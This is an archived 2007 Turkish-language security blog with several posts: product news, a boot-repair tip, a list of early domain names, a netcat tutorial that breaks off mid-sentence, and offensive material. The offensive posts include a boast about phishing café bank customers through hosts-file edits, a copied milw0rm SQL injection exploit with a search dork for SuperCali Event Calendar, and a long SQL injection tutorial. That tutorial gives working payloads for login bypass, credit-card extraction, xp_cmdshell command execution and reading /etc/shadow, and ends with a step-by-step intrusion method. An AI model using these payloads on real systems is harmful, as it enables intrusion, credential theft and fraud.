Friday, July 27, 2007

SMS 007 - Güvenli SMS Mesajlaşma İçin Bir Yazılım

Çekoslavak firma CircleTech'in hazırlamış olduğu yazılım mobil telefonlar için bir Java (J2ME) uygulaması. Ana amacı kriptolama kullanarak mesajların alıcı haricinde kimse tarafından okunamamasını sağlamak.

SMS 007 mesajları kriptolamada AES algoritmasını kullanıyor. Gönderilen ve alınan mesajlar için telefonun Gelen Kutusu/Giden Kutusu bölümleri kullanılmıyor. Ayrıca şifre ile girilen ayrı bir kontak listesi var.

Detaylı bilgi ve yazılım aşağıdaki adresten temin edilebilir:
http://www.sms007.cz/index.php?lang=en&type=special&page=htmlenter

Yeni Kredi Kartı Büyüklüğünde Güvenlik Cihazları

Yoggie Security Systems bugün ödüllü Yoggie Gatekeeper serisinin kredi kartı büyüklüğündeki yeni cihazlarını (Yoggie Gatekeeper Personal ve Yoggie Gatekeeper SOHO) duyurdu. YG Personal tüketicilerin dizüstü bilgisayar ve PC'lerini korumak için, YG SOHO ise ev veya küçük ofis ağlarındaki 5 adet bilgisayarı korumak için dizayn edilmiş.


Yoggie Gatekeeper aşağıdakileri sunuyor:
- Donanım tabanlı kullanımı kolay güvenik çözümü - komplike kurulum ve konfigürasyon gerekmiyor - takın ve unutun
- Kafa karıştırıcı mesajlar gösteren ağır yazılım ürünleri kurulmuyor
- Kullanıcıyı rahatsız etmeden veya bilgisayar kaynaklarını harcamadan 1 saatte bir Internet'ten güncelleme yapıyor
- Basit tek adımlık güvenlik - USB'ye takmak yeterli
- Korunmasız veya yetkisiz Internet erişimini engelliyor. Gatekeeper'ı çıkartarak tüm ağ bağlantıları durdurulabiliyor
- Çocukların YG Personal güvenlik ve ebeveyn kontrolü özelliği ile Internet'e erişiminin kontrolü
- Web ve Eposta tehditlerine karşı koruma için tek basit bir cihaz
- Basit kurulum - Internet hattı ve evdeki bilgisayarlar arasına takarak ağdaki tüm bilgisayarların korunması
- Tek bir cihazda birden fazla, tümleşik güvenlik çözümü - birden fazla güvenlik çözümü alarak entegre etmek gerekmiyor

Ayrıca YG SOHO ürünü ile ağa bağlı 5 bilgisayar için Enterprise seviyesi güvenlik koruması da mümkün oluyor.

520MHz işlemci ve 128MB hafızaya sahip Yoggie Gatekeeper Personal'ın fiyatı $199 civarında. İçerdiği yazılımların güncellenmesi için ise yıllık olarak $29,90 ödeniyor. Yoggie Gatekeeper SOHO ise normalde $249 fakat kısa tanıtım süresince $199 dan satılıyor. YG SOHO'nun yıllık lisans yenileme ücreti ise $39,90.

Kaynak: http://www.net-security.org/secworld.php?id=4906

Wednesday, July 18, 2007

Boot Sector Tamiri !

1. MBR, birincil sabit disk alanıdır, sıfırlamak - dos ortamında fdisk /mbr uygulayabilirsin...





2.WinXP kullaniyorsan, Bootable XP CDsi ile kurulum programini calistirip, R tusu ile Recovery Console 'a geciyorsun. Admin sifresini girip, fixboot yaziyorsun. "Boot Sector"u tamir ediyorsun.


İngilizceden Çevirdiğim Kaynak Adres: http://www.ntfs.com/boot-sector-damaged.htm

Saturday, July 14, 2007

Phishing The Hosts

arkadaslar cafede banka hesabina giren bir çok kisi görmüssünüzdür.ve o müsterilerin baskalarinin tuzagina düsme ihtimali vardir :)
tuzak şöyle ki ; system32\etc\ dizinindeki hosts dosyasında bir kaç değişiklik yapınca çok güzel bir phishing olayı gerçekleşiyor...olay bundan ibaret.
ayrıca şu videoda hacked show yapanlarda herşeyi yalan :D
aynen şu phishing olayı !

video:
http://rapidshare.com/files/34320650/phishing_the_hosts.rar.html

eğer videoda hacked'e inanıyorsanız hala bunada inanın çünkü burada garanti.com.tr'yi mitnicksecurity.com a yönlendiriyorum videoda izlediğiniz gibi :)

Web Site Dünyasının Tarihi Gelişimi !

Bilindiği Gibi Internet Dunyası Gelince Erisilmesi Kolay Hale Gelen Şeyler Çok ...80'li yıllarda internet Dünyasında pek website yoktu... bir liste buldum 80'li yıllarda açılan websiteleri 100 tane

100 Tarihi WebSitesi :

1. 15-Mar-1985 SYMBOLICS.COM
2. 24-Apr-1985 BBN.COM
3. 24-May-1985 THINK.COM
4. 11-Jul-1985 MCC.COM
5. 30-Sep-1985 DEC.COM
6. 07-Nov-1985 NORTHROP.COM
7. 09-Jan-1986 XEROX.COM
8. 17-Jan-1986 SRI.COM
9. 03-Mar-1986 HP.COM
10. 05-Mar-1986 BELLCORE.COM


11. 19-Mar-1986 IBM.COM
12. 19-Mar-1986 SUN.COM
13. 25-Mar-1986 INTEL.COM
14. 25-Mar-1986 TI.COM
15. 25-Apr-1986 ATT.COM
16. 08-May-1986 GMR.COM
17. 08-May-1986 TEK.COM
18. 10-Jul-1986 FMC.COM
19. 10-Jul-1986 UB.COM
20. 05-Aug-1986 BELL-ATL.COM
21. 05-Aug-1986 GE.COM
22. 05-Aug-1986 GREBYN.COM
23. 05-Aug-1986 ISC.COM
24. 05-Aug-1986 NSC.COM
25. 05-Aug-1986 STARGATE.COM
26. 02-Sep-1986 BOEING.COM
27. 18-Sep-1986 ITCORP.COM
28. 29-Sep-1986 SIEMENS.COM
29. 18-Oct-1986 PYRAMID.COM
30. 27-Oct-1986 ALPHACDC.COM
31. 27-Oct-1986 BDM.COM
32. 27-Oct-1986 FLUKE.COM
33. 27-Oct-1986 INMET.COM
34. 27-Oct-1986 KESMAI.COM
35. 27-Oct-1986 MENTOR.COM
36. 27-Oct-1986 NEC.COM
37. 27-Oct-1986 RAY.COM
38. 27-Oct-1986 ROSEMOUNT.COM
39. 27-Oct-1986 VORTEX.COM
40. 05-Nov-1986 ALCOA.COM
41. 05-Nov-1986 GTE.COM
42. 17-Nov-1986 ADOBE.COM
43. 17-Nov-1986 AMD.COM
44. 17-Nov-1986 DAS.COM
45. 17-Nov-1986 DATA-IO.COM
46. 17-Nov-1986 OCTOPUS.COM
47. 17-Nov-1986 PORTAL.COM
48. 17-Nov-1986 TELTONE.COM
49. 11-Dec-1986 3COM.COM
50. 11-Dec-1986 AMDAHL.COM
51. 11-Dec-1986 CCUR.COM
52. 11-Dec-1986 CI.COM
53. 11-Dec-1986 CONVERGENT.COM
54. 11-Dec-1986 DG.COM
55. 11-Dec-1986 PEREGRINE.COM
56. 11-Dec-1986 QUAD.COM
57. 11-Dec-1986 SQ.COM
58. 11-Dec-1986 TANDY.COM
59. 11-Dec-1986 TTI.COM
60. 11-Dec-1986 UNISYS.COM
61. 19-Jan-1987 CGI.COM
62. 19-Jan-1987 CTS.COM
63. 19-Jan-1987 SPDCC.COM
64. 19-Feb-1987 APPLE.COM
65. 04-Mar-1987 NMA.COM
66. 04-Mar-1987 PRIME.COM
67. 04-Apr-1987 PHILIPS.COM
68. 23-Apr-1987 DATACUBE.COM
69. 23-Apr-1987 KAI.COM
70. 23-Apr-1987 TIC.COM
61. 23-Apr-1987 VINE.COM
72. 30-Apr-1987 NCR.COM
73. 14-May-1987 CISCO.COM
74. 14-May-1987 RDL.COM
75. 20-May-1987 SLB.COM
76. 27-May-1987 PARCPLACE.COM
77. 27-May-1987 UTC.COM
78. 26-Jun-1987 IDE.COM
79. 09-Jul-1987 TRW.COM
80. 13-Jul-1987 UNIPRESS.COM
81. 27-Jul-1987 DUPONT.COM
82. 27-Jul-1987 LOCKHEED.COM
83. 28-Jul-1987 ROSETTA.COM
84. 18-Aug-1987 TOAD.COM
85. 31-Aug-1987 QUICK.COM
86. 03-Sep-1987 ALLIED.COM
87. 03-Sep-1987 DSC.COM
88. 03-Sep-1987 SCO.COM
89. 22-Sep-1987 GENE.COM
90. 22-Sep-1987 KCCS.COM
91. 22-Sep-1987 SPECTRA.COM
92. 22-Sep-1987 WLK.COM
93. 30-Sep-1987 MENTAT.COM
94. 14-Oct-1987 WYSE.COM
95. 02-Nov-1987 CFG.COM
96. 09-Nov-1987 MARBLE.COM
97. 16-Nov-1987 CAYMAN.COM
98. 16-Nov-1987 ENTITY.COM
99. 24-Nov-1987 KSR.COM
100. 30-Nov-1987 NYNEXST.COM

Friday, July 13, 2007

Php Vulnerability Scanner

Php Vulnerability Scanner: Download
--------------------------------------------------------------------------------
Usage: host [start_path][port][debug]
host: target server (ip/hostname)
path: path from which to start scanning, if none entered starts from '/'
port: port of the http server, default 80

Examples:
localhost /folder/script.php 81

--------------------------------------------------------------------------------

Wednesday, July 11, 2007

SuperCali Event Calendar SQL Injection Vulnerbility

AUTHOR: t0pP8uZz & xprog
SITE: http://supercali.inforest.com/
DORK: allintext:"SuperCali Event Calendar"

DESCRIPTION:
Pull out members info from the database.

EXPLOITS:
http://www.server.com/index.php?o=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(email,0x3a,password),4,5,0x677269642E706870/**/from/**/users/*

# milw0rm.com [2007-07-03]

Tuesday, July 10, 2007

SQL Injection

SQL Injection(SI)'nin calisma mantigi nedir?

Sql injecktion web aplikasyonu ustunden databasede oynamalar yapmamizi saglayan bir cesit input manipulasyonudur, serverda beklenmedik sql komutlari calistirarak istediginiz veriyi silebilir, ekleyebiliriz, sifreleri gecersiz kilip sisteme girebiliriz.Meselea asagidaki ornekte database gonderilen normal bir sql statementini gormektesiniz.

kod:
1:
SELECT name FROM userlist WHERE uid='$user_id' AND pwd='$password';


bu statement kullanicidan aldigi $user_id ve $password degiskenlerini database bildirmektedir. Mesela asagidaki ornek script bu isi icra eder.

php:
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
16:
17:
URL = HTTP.GetFromUser()
user_id = URL.parameter("'user_id"')
password = URL.parameter("'
password"')
query = "'SELECT name FROM userlist WHERE uid='"' + user_id
+ "''
AND pwd='"' + password + "'';"'
database.connect()
result = database.execute(query)
if result
HTTP.Send("'
Login successful. Welcome, "' + result)
IsAuthenticated = true
else
HTTP.Send("'User ID or password is incorrect."'
)
IsAuthenticated = false
end
if
if
IsAuthenticated
HTTP
.Send(MainMenu)
end if


Kullanicinin bilgilerini girdigi url ciktisi ise asagidadir:

php:
1:
https://website/login.cgi?user_id=whoami&password=root 


Eger girilen veriler dogrusu ise program kullanciya giris haklarini verecektir. Simdi de olaya bir de tersinden bakalim, Eger SI sokarsak durum ne olur??
php:
1:
http://website/login.cgi?password=root';%20-- 


Kullandigimiz parametreyi encode de edebiliriz bu sekilde ihtimal dahilindeki filtrelemeleri de gecebilme sansina sahib olabiliriz.Burada SI sirasinda kullandigimiz parametre (--) double dash'tir. Sql dilinde double dash aslinda yazilan satirin bir yorum satiri oldugunu gosterir, Yani bu ornekte $password degiskenine ek olarak double dash da ekledigimiz zaman sql bunu bir yorum satiri sanarak yorumlamayip es gecmektedir.

Select Statement Manipulasyonu:

Yine cok bilinen bir yomtem de Select statementina dogru olan bir durum eklenmesidir. mesela:

php:
1:
2:
3:
https://website/login.cgi?user_id=whoami&password='%20OR%20''%3d'

SELECT name FROM userlist WHERE uid='whoami' AND pwd='' OR '='';

veya:
php:
1:
2:
3:
https://website/login.cgi?user_id=dcooper&password=foo%20OR%201%3d1

SELECT name FROM userlist WHERE uid=whoami AND pwd=foo OR 1=1;

bu tip saldirilari eger hedef sistemiin hem kullanici adi hem de password degiskenlerine karsi kullanip da basarili olursaniz genellikle tabledaki ilk userin haklari ile sisteme girersiniz, ki bu sanssiz kisi de genellikle admin olur.

php:
1:
2:
3:
https://website/login.cgi?user_id='%20OR%20''%3d'&password='%20OR%20''%3d'

SELECT name FROM userlist WHERE uid='' OR '=' AND pwd='' OR '=';


ek olarak eger bu islem basarili olupda girdiginiz querynin sonucu browsera dokuluyorsa, o zaman url satirindan joker karakter olan % karakteri ile tum kullanicilarin adlarina ulasabilirsiniz. dikkat etmeniz gereken nokta % karakterinin encode olarak yazmalisiniz.

php:
1:
2:
3:
https://website/login.cgi?user_id=%25';--

SELECT name FROM userlist WHERE uid='%';--' AND pwd='';


URL ustunden girisirken bosluk karakteri muhakkak encode olmalidir (%20), ya da bosluk karakteri yerine + karakteri kullanilmalidir.


SELECT AND UNION ile veri cekme:

php:
1:
2:
3:
https://website/login.cgi?user_id=foo&password='+UNION+ALL+SELECT+uid,+pwd+FROM+userlist+WHERE+''%3d'

SELECT name FROM userlist WHERE uid='foo' AND pwd='' UNION ALL SELECT uid, pwd FROM userlist WHERE '='';


Bu da select and union ile farkli bir tabledaki veriyi ceken bir statement ornegi.dikkat ediyorsaniz bosluk karakteri yerine + karakterini kullaniyoruz.

php:
1:
2:
3:
https://website/login.cgi?user_id=foo&password=%27+UNION+ALL+SELECT+first%5fname%2clast%5fname%2cccard+FROM+store+WHERE+%27%27%3d%27%27;

SELECT name FROM userlist WHERE uid='foo' AND pwd='' UNION ALL SELECT first_name,last_name,ccard FROM store WHERE '='';


INSERT komutu ile database modifiye etmek:

Standart olarak su sekilde kullanilir:
php:
1:
INSERT INTO user (User,Password) VALUES(albert','camus');


URL uzerinde calisirken:
php:
1:
https://website/login.cgi?user_id=&password=%27;+INSERT+INTO+userlist+%28uid%2cpassword%29+VALUES%28%27albert%27%2c%27camus%27%29;--+ 

bu da script icindeki sekli:
php:
1:
SELECT name FROM userlist WHERE uid='' AND pwd=''; INSERT INTO userlist (uid,password) VALUES(albert','camus');-- ;


Bu islemler ile asil amacimiz database yeni bir kullanici eklemek, yanliz dikkat edilmesi gereken bir husus sifrenin genellikle bos birakilmasi gerektigidir, cunku genellikle cogu server plain text password yerine hash bekledigi icin bu bizim icin ekstra is demektir, bu nedenle bos kullanmak daha mantiklidir.

SI yaparken gordugunuz gibi hedef databasin yapisini iyi bilmek gerekir, tabiki table isimleri, deigsken adlari, o serverin standart degiskenlerini hepsini iyi bilmek gerekmektedir. bunun icin hem temel bilginiz olmali hem de servera verdirdiginiz hata mesajlarini cok iyi analiz etmeniz gerekmektedir. asagidaki sema da bazi sql serverlarin hakkinda temel bilgiler gosterilmistir, dikkarle incelemeniz onerilir. Bir altindaki semada ise bazi cok yaygin olarak kullanilan sql stringleri gosterilmistir.






Simdi sirayla SQL kullanan serverlari inceleyelim:

MSSQL:

SI calistirabilecek mssql serverlari bulmanin en kolay yolu URL ustundeki parametlere ' tek tirnak karakteri eklemektir. vulnerable olan serverlarda bizlere cesitli bilgiler sunacak olan hata mesajlari vereceklerdir. Asagida bu tip hata mesajlarindan 3 tanesi verilmistir.

php:
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
//Warning: SQL error: [Microsoft][ODBC SQL Server Driver]
// [SQL Server] Unclosed quotation mark before the characte
// string '??'., SQL state 37000 in SQLExecDirect in
// D:\icp_php\dvd\glossary.php on line 52

//[Microsoft][ODBC SQL Server Driver][SQL Server]Procedure
//'individual_demographic_sel' expects parameter
//'[at]individual_id', which was not supplied.
///registration/demographic.asp, line 7

//[ODBC error 1814: (37000) [Microsoft][ODBC SQL Server
// Driver][SQL Server]Incorrect syntax near the
// keyword 'and'.]


Asagidaki orneklere bakarsaniz mssqlin sadece asp calistiran IISlerde calismadigini da anlarsiniz

php:
1:
2:
3:
4:
5:
6:
7:
8:
9:
//Warning: SQL error: [Microsoft][ODBC SQL Server Driver]
//Communication link failure, SQL state 08S01 in
//SQLExecDirect in C:\Apache2\htdocs\Dunaj\db.php on line 386
//Microsoft OLE DB Provider for ODBC Drivers error '80040e09'

//[Microsoft][ODBC SQL Server Driver][SQL Server]EXECUTE
//permission denied on object 'sp_calusertype', database
//'EventCal', owner 'dbo'.
///queries/MaintainEvents.asp, line 47


Mssqlde SI calisirken saldiriniza renk katan en onemli ozelligi acik olan serverlarin ayni xplerdeki cmd.exe gibi bir shell aclistirmaniza olanak saglamasi ve bir takin komutlari calistirabilmesidir. bunlarin arasinda en sik bilineni xp_cmdshell komutudur.

php:
1:
EXEC master.xp_cmdshell command'


URL uzerinden girisirken
php:
1:
https://website/vuln.cgi?param=';xp_cmdshell+ipconfig+/all'+;-- 


Ek olarak acik olan mssqllerde calistirabileceginiz komutlar asagidaki semada verilmistir. Sekillerdeki komutlari neten daha sonra ayrintili olarak ogrenmeye calismaniz gerekmektedir



Bir kac ornek vermek gerekirse SI acigi olan bir mssqli SHUTDOWN WITH NOWAIT; komtu ile remote olarak kapatabilirsiniz, server online olunca tekrar kapatabilirsiniz, artik en zaman ids loglarini inceleyip server admini cakarsa o zamana kadar server ile mum sondu oynayabilirsiniz. Bir baska ornek ise BACKUP database master to disk='\\ipaddress\share\bak.dat'; komutu ile whole databasei baska bir konuma kopyalayabilirsiniz.(bu komutun calismasi icin kendi bilgisayarinizda bir paylasim acmaniz gerekmektedir)

Faydali objectker ve Degiskenler:
Mssqlde internal degiskenler [at][at] on adi ile tanimlanilar ve basit SELECT statementlari ile kullanilabilirler. Asagidaki semada bahsettigimiz internal degisken ve objectlerin listesini bulabilirsiniz.



MYSQL:

Mysqlde yorum satiri aksiyonunundan bahsetmistik ufak bir kac eklemeyle tekrar ustunden gecelim. Mysqlde yorum satiri --%20 veya # veya /* hello world */ seklinde olabilir. Bunu nerde kullandigimiz yukarda yazmistik.


Dosya Sisteminden Veri Cekmek:
Mysqlin dosya okumamiza saglayan bir kac komutu vardir, bu komutlar eger dosya okunabilir erisime sahip ise ve database klasorunun (datadir degiskeninin degeri yani) altinda ise dosya okumamizi saglar, kissadan hisse yazmak gerekirse eger mysql kaza ile ! root olarak calistirilirsa o zaman /etc/shadowdan hashlari alabilirsiniz.bu durumda hashlari almak 3 basamaktan olusmaktadir. 1. hashlarin icinde bulundugu table yazmak, veya halihazirda boyle bir table bulunabilir, 2. bu tablein icini /etc/shadow ile doldurmak icin LOAD DATA INFILE komutunu calistirmak, 3. kendi yaptigimiz tablein icindeki ilk satiri SELECT komutu ile cekmek.gosterirsek:

php:
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
16:
//mysql> CREATE TABLE foo (bar TEXT);
//Query OK, 0 rows affected (0.02 sec)
//mysql> LOAD DATA INFILE '/etc/passwd' INTO TABLE foo;
//Query OK, 27 rows affected (0.02 sec)
//Records: 27 Deleted: 0 Skipped: 0 Warnings: 0
//mysql> SELECT * FROM foo;
//+---------------------------------------------------------+
//| bar |
//+---------------------------------------------------------+
//| root:x:0:0:root:/root:/bin/bash |
//
//| mike:x:500:500:mike:/home/mike:/bin/bash |
//| mysql:x:78:78:MySQL server:/var/lib/mysql:/bin/bash |
//| postgres:x:79:79:system user:/var/lib/pgsql:/bin/bash |
//+---------------------------------------------------------+
//27 rows in set (0.02 sec)


URL uzerinden calisirken suna benzer parametreler gorebilirsiniz:

php:
1:
2:
3:
https://website/vuln.cgi?param=%27';+CREATE+TABLE+foo+%28bar+TEXT%29;
https://website/vuln.cgi?param=%27;+LOAD+DATA+INFILE+%27%2fetc%2fshadow%27+INTO+TABLE+foo;
https://website/vuln.cgi?param=%27;+SELECT+%2a+FROM+foo;

Dosya Sistemine Veri Yazmak:

Eger web server ve database server ayni hostda degilse ve mysql userin yazma hakki yoksa web root dizinine dosya yazamazsiniz.

OZET YAPARSAK::!::
yukarda bazi temel hack tiplerinden bahsettik fakat kompresif bir metedolojiden bahsetmedik, yani olayin sistemedigini soylemedik, simdi bu hatamizi telafi edicegiz

- Hangi parametrenin hata verdirdigin bulmeya calisin. %00, %27, %3B gibi parametleri kullanip, serverin verdigi hatalari cok iyi analiz edin.
- Hatalar icinde database, column ve table isimlerini arayin.
- Standart degiskenleri kullanarak sistem hakkinda bilgi sahibi olmaya calisin.
- Standart database objelerini sorgulayin (database. table. column isimleri)
- Use OR TRUE = TRUE komutu loginleri bypass edin.
- Buldugunuz standart database tablelarin icine istediginiz bilgiyi yerlestirin.
- xp_cmdshell 'le server ustunde komut calistirmaya calisilin
-ftp,tftd veya netcata dosya godnermeye calisin
-dosyalari web root klasore kopyalayin
-onemli konfigurasyon dosyalarinin ustune istediginiz verileri yazin
-sistemi iptal edin

Netcat, Telnet, Reverse Telnet

Netcat, Telnet, Reverse Telnet, vs.
Bu yazıda Unix'in efsanevi komutlarından belki de en gençlerinden birine sistem yöneticilerinin ve hackerların daim dostu NetCat'e basitçe değinmeyi amaçladım.

Her ne kadar basitçe değinecek olsam networkle ilgilenenlerin işe yarar bir şeyler bulacağınıza inanıyorum bu yazıda. Özellikler Reverse Telnet birçok download meraklısının ilgisini çekecektir ;)

Unix'e aşina olanlar bilir. Unix'in temelinde yatan MO (Modus Operande; operasyon yöntemi) herbiri tek bir işi mükemmel yapan programcıkları biraraya getirmektir. Zaman zaman Emacs gibi kazalar olsa da :p bu mantık bu güne kadar belki de Unix'in en güçlü olduğu alan olmuştur.

Her biri küçük küçük programcıklar olan basit temel Unix komutları: ls, cat, wc, yes, false, sleep vs. genellikle bir shell ortamında (sh, bash, tcsh vs.) yönlendirme komutlarıyla da biraya geldiklerinde oldukça başarılı işler ortaya koyar.

En basitinden ls -al|more dediğinizde ls komutunun çıktısı takip edebileceğiniz gibi sayfa sayfa karşınıza gelir. Mesela ls komutu bir dizindeki dosyaları gösterirken, ls|wc -l komutu ls komutunun çıktısını wc (wordcount) komutuna gönderek o dizinde kaç dosya olduğunu gösterir. Görüyorsunuz iki alakasız komutla ls komutuna yeni fonksionlar kazandırdık.

Birkaç kelimelik bu tür komutlarla yapabileceğiniz şeylerin ne kadar derine gidebildiğini görseniz şaşarsınız. Dahası bir shell ortamı gibi yapıştırıcı bir sahte-programlama dili ile birleştirildiğinde bu komutlar gerçekten uygulama düzeyinde işlerin altından kalkabilirler.

İşte bu Unix felsefesinden gelen temel komutların hepsi onlarca yıldır kullanılmakta ve birçok ihtiyaca cevap verebilmekte. Bu temel komutlardan biri, herne kadar ağabeyleriyle karşılaştırıldığında çok genç kalsa da, yazılım mantığı ve işlevselliği açısından onları kesinlikle aratmayan bir komut: NetCat.

İsminden de anlaşılacağı gibi cat komutundan yola çıkarak yazılmış bir komut. cat komutu ise Unix'in en temel komutlarından biri. Basitçe yaptığı bir dosyayı alıp standart çıktıya yönlendirmek. Tabi Unix denince bu basit tanımlı programla bir çok şey yapabilirsiniz. Bu çıktıyı bir yazıcıya yönlendirebileceğiniz gibi bir CD yazıcıya gönderip CD basabilir (büyük ihtimalle bozuk olur ;) ya da ses kartına gönderip gürültü dinleyebilirsiniz.

Tabii başka bir programla birleştirip bu sefer söz konusu dosyayı ses kartından insan sesi ile okutturabilir, dahası bu çıkan sesi audio cd olarak da basabilirsiniz. Ve işin güzel yanı bütün bunları yukardaki örnek gibi basit birkaç komutu birleştirerek yapabilirsiniz.

Hemen bir örnek vermek gerekirse cat'in kuzeni olan zcat'i pratik olarak kullanabiliriz.

Adından da anlaşılabileceği gibi zcat, cat komutunun zip algoritması ile bütünleştirilmiş halidir. Basitce .gz uzantılı dosyaları sanki sıkıştırılmamışlar gibi çıktıya verir.

Eğer makinanızda netcat kurulu ise /usr/share/doc/netcat/README.gz diye bir dosya olacaktır büyük ihtimalle. Normalde bu bir text dosyası olsaydı bunu kolayca less README diye açabilirdik, fakat bu sıkıştırılmış bir dosya, peki şimdi ne yapacağız. Basit:

zcat README.gz|less

README.gz dosyasını standart çıktıya gönder (açıp) ve onu da less komutuna ver, sanki bir dosyaymış gibi.

NetCat de işte bu temel Unix komutunun Network üzerinden TCP ve UDP soketlerle işleyen ve etkileşimli hali.

Peki ne yapar bu NetCat?
-------------------------

Öncelikle NetCat en basit anlamıyla bir telnet programıdır. Bu biraz İsviçre Çakısı bir bıçaktır demeye benziyor. Temelde hemen her türlü telnet ihtiyacı için kullanılan bir telnet programı. 1996'da Hobbit tarafından yazılan bu program bütün Unix varyantlarında bulunmakla birlikte NT başta olmak üzere diğer Windows platformlarına da aktarılmıştır edilmiştir. Dahası program geliştirilip ssh bağlantısı sağlayan cryptocat de kullanılabilir.

Biz bu yazı içinde sade netcat'e bağlı kalıp örneklerimizi onun üstünde vereceğiz. Temel platform olarak Unix alınmıştır eğer başka bir platformda bunları denerseniz bilgisayarınız havaya uçabilir, kız arkadaşınız sizi terkedebilir ve belki de en kötüsü bir anda kahve bitebilir ;)

Ne yapıyorsanız kendi riskinize yapıyorsunuz, hiçbir şeyin garantisi yok; bunu hala öğrenemeyenler var o yüzden her yazıda bu satırları yazmak zorundayız :) Hayatınızı yaşayın ve öğrenin...

Dosya Transferi
----------------

Ön Hazırlık
------------

Bu yazı boyunca yapacağımız işlemler için bir ön hazırlık yapmamız lazım.

Zira yazı boyunca iki sanal makina arasındaki network bağlantısından sözedeceğiz. Bunu simüle etmek için de bazı düzenlemeler yapmamız gerekiyor. Bu makalede yazanları denemeniz için makinanızın Internet'e bağlı olması, hatta ethernet kartı olması bile gerekli değil.

Unix makinaların tcp iletişim konusunda ethernet aygıtları gibi sanal bir aygıt olan lo (loopback) aygıtları bulunmaktadır. Adresi 127.0.0.1 olan bu aygıt, makinanın kendisine işaret eder. Linux altında bunun yerine 0 da kullanabilirsiniz. İşte biz de burada vereceğimiz örnekler için bu aygıtı lo'u kullanacağız.

Fakat burda önemli nokta 127.0.0.1 adresine sahip lo aygıtına müdahale etmememiz gerektiği. Bu adresi değiştirmek bizim normal ağ bağlantılarımızı bozar. Bunun yerine lo:1 diye aynı aygıt üstünden yeni bir network aygiti tanımlayacağız. Bu işi eth0 veya eth1 gibi bir ethernet kartı üzerinden de yapıp bir ethernet kartına birçok IP numarası atayabilirdik.

Yapacağımız işlem (tabi ki bunu root olarak yapmamız lazım)

ifconfig lo:1 10.0.1.1

ifconfig lo:2 10.0.1.2

Şimdi ise ifconfig komutu ile baktığımızda şöyle bir şeyler görmemiz lazım

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:146 errors:0 dropped:0 overruns:0 frame:0
TX packets:146 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:7708 (7.5 KiB) TX bytes:7708 (7.5 KiB)
lo:1 Link encap:Local Loopback
inet addr:10.0.1.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
lo:2 Link encap:Local Loopback
inet addr:10.0.1.2 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1


Tamaam artık iki tane network aygıtımız var: lo:1 ve lo:2 bunlarla sanki bağımsız makinalarmış gibi NetCat deneyleri yapabileceğiz.

Network Bağlantısı
-------------------

Dediğimiz gibi netcat en basit haliyle bir telnet istemcisi gibi kullanılabilir. nc host port komutu ile sözkonusu host makinasına herhangi bir açık porttan bağlanıldığında yazdığınız her şey karşı tarafa gider, karşı tarafın her tepkisi de size gelir. Bu aradaki ağ bağlantısı kesilene kadar sürer (ki bu davranış, dosya-sonu (EOF) işareti gelene kadar bağlantıyı açık tutup bu işareti alınca kesen birçok programdan faklıdır).

NetCat bir istemci olduğu gibi bir sunucudur da aynı zamanda.

Şimdi iki tane konsol açalım: Bir tanesi bizim sunucumuz olacak 5600 nolu portu dinleyecek

netcat -l -p 5600



Diğeri ise istemcimiz olacak ve bu porta bağlanacak:

netcat 10.0.1.1 5600

Şu anda ikinci konsolda yazdığınız herşey ilk konsolda tekrarlanacaktır. İlk bağlantımızı gerçekleştirdik. Biraz deneyler yapın, entera basin, backspace basın, ctrl-d, ctrl-c yapın neler olduğunu gözlemleyin.

Ctrl-C bağlantınızı kesmiş olsa gerek. Şimdi biraz daha farklı bir şey deneyeceğiz.

İlk konsolda bu sefer

netcat -l -p 5600 -vv

yazın. İkincisindeki komut yine aynı:

nc 10.0.1.1 5600

Bir farklılık gördünüz mü?

listening on [any] 5600 ...
10.0.1.1: inverse host lookup failed: Unknown host
connect to [10.0.1.1] from (UNKNOWN) [10.0.1.1] 33354

NetCat bu sefer size bir sürü bilgi verdi. Bunun sebebi kullandığımız -vv komutu. Bunu tek v ile kullanırsanız biraz daha az bilgi alırsınız, bazı problem çözme durumlarında çok hayat kurtarıcı olabilir bu özellik.

Bu sefer ctrl-c ile kestiğimizde ise NetCat sunucu tarafında bize ne kadar veri gönderilip ne kadar veri alındığını belirtir.

Böylece bir network aygıtından bir diğerine protokol, izin vs. derdi olmadan (firewall'lar elverdiğince) bağlandık.

Dosya Transferi
---------------

NetCat'in en basit özelliklerinden biri olan bu özellik, bütün basit şeyler gibi akıllı bir kullanıcının elinde hemen her şey için kullanılabilir.

En pratik yanlarından biri mesela dosya transferi. Daha yeni kurulmuş bir makinaya dosya transferi için ftp sunucusu kurmak, kullanıcıları ayarlamak, daha da kötüsü rcp/scp gibi protokollerle uğraşmak çok başağrıtıcı olabilir. En basitinden bu komutlar makinada bulunmamaktadır bile vs.

Sadece bir netcat komutu ile bu işlemleri yapmamız mümkün.

Kullanım hala basit; sunucu tarafında:
nc -v -w 30 -p 5600 -l > dosyaismi.back

istemci tarafında ise:

nc -v -w 2 10.0.1.1 5600 <>

Gördüğünüz gibi bir taraftan gelen dosyaismi isimli dosya diğer tarafta dosyaismi.back şeklinde oluşturuldu. İçeriklerine bakarsanız bu iki dosyanın aynı olduğunu da görürsünüz. Tabii bu iş için bir fark olmadığını görebilmeniz açısından herhangi bir ASCII metin dosyası kullanmanızda fayda var.

Komut satırını incelediğimizde yeni argüman olarak -w komutunu görüyoruz. -w bize beklememiz için gereken süreyi verir. Sunucu tarafında bunu daha uzun tuttuk zira alıcı, dolayısıyla bir gecikmeden etkilenecek taraf orası. İstemci tarafında ise 2 sn yeterli geldi. Genelde bu süre telnet istemcilerinde 3 sn civarındadır, -w 3 kullanırsanız bu tür uygulamalarınızda pek sorunla karşılaşmazsınız.

-v komutunun yapılan işlem hakkında bilgi verdiğini zaten anlatmıştık. Bir başka önemli nokta da Unix kullanıcılarının yakından bildiği > yönlendirme işareti.

Sunucu tarafında netcat çalıştırırken > dosyaismi.back dedik, bu komutun çıktısını > dosyaismi.back dosyasına gönder anlamını taşıyordu. İştemcide kullandığımız <>

